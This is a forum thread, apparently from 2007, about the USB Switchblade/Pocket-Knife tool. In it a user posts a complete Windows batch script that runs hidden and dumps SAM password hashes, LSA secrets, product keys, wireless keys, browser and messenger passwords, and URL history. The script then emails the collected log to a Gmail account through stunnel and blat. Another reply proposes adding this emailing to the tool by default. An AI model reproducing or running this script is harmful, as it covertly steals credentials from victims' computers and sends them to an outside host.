jawbreaker Posted August 16, 2007 Posted August 16, 2007 When I run the SBConfig. exe there is a place to put Email address and passwords. I would like it to email out to give basic information IP and username of system. Basically email me the log file that is created Is that built in or do I have to modify the Hackblade to do that for me. This is a great tool. Thank you in advance. Quote
W4RP3D Posted August 17, 2007 Posted August 17, 2007 I did this the other day, go to http://forums.hak5.org/index.php/topic,6746.0.html and download the latest Pocket-Knife, install it on the USB stick as normal, go to WIPCMD. Save to code below as a batch script there (changeing the Gmail Password and Username). When you run it it emails the basic switchblade stuff to you email. title Swicthblade Email nircmd win hide title "Swicthblade Email" @echo off if not exist ....Documents md ....Documents >nul if not exist ....Documentslogfiles md ....Documentslogfiles >nul Echo ************************************ > ....Documentslogfiles%computername%.log 2>&1 echo ***********[System info]************ >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> ....Documentslogfiles%computername%.log 2>&1 ipconfig /all >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .produkey /nosavereg /stext "....Documentslogfiles%computername%_pk.log" /remote %computername% >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_pk.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_pk.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump LSA secrets]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .pspv.exe /stext "....Documentslogfiles%computername%_LSA.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_lsa.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_lsa.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ****[Dump LSA secrets Alternate]**** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .lsadump.exe >> "....Documentslogfiles%computername%_LSA.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_lsa.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_lsa.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .netpass.exe /stext "....Documentslogfiles%computername%_np.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_np.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_np.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo **********[Dump messenger PW]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .mspass.exe /stext "....Documentslogfiles%computername%_ms.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_ms.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_ms.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ****[Dump Internet Explorer PWDS]*** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .iepv.exe /stext "....Documentslogfiles%computername%_ie.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_ie.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_ie.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1 copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log >> nul del /f /q "....Documentslogfiles%computername%_wk.log" >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump URL History]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 cscript //nologo .DUH.vbs >> ....Documentslogfiles%computername%.log 2>&1 TYPE ....Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "ASPNET" | find /V "HelpAssistant" >> ....Documentslogfilespwfile.txt set RtD=%CD% cd /D "%appdata%MozillaFirefoxProfiles" >nul set PROFILE= for /D %%i in (*) do set PROFILE=%%i cd /D %RtD% >nul Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 Echo *********[Dump Firefox PW]********** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 .FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> ....Documentslogfiles%computername%.log move ....Documentslogfiles*.log ....Documentslogfiles%computername% move ....Documentslogfiles*.txt ....Documentslogfiles%computername% ::gets to sbs cd cd wipsbs :: Configure Email Options SET emailfrom=GMAIL USERNAME SET emailto=GMAIL USERNAME SET password=GMAIL PASSWORD ::Starts Stunnel stunnel-4.11.exe -install -quiet net start stunnel ::Blat send computerdata.txt blat.exe ....Documentslogfiles%computername%%computername%.log -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 -subject Switchblade_%computername% ::Ends Stunnel and net stop stunnel stunnel-4.11.exe -uninstall -quiet Exit Ps. I know the codes crummy but it works so hey Quote
Leapo Posted August 25, 2007 Posted August 25, 2007 Heh, interesting way of doing it...why not just let it create the standard log files (no need to edit go.bat), then make a second batch file (launched by start.bat) that emails those logs? same result, no need to edit an existing component...you know what, I'll add the option to email all generated logs to the default pocket knife Quote
W4RP3D Posted August 31, 2007 Posted August 31, 2007 Its because i have an encrypted part of my thumb drive with everything on apart from this and the tools neaded to do it, so if it gets stolen this will auto run and i can find out who has it, and if they dont want to give it back cause them alot of trouble. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.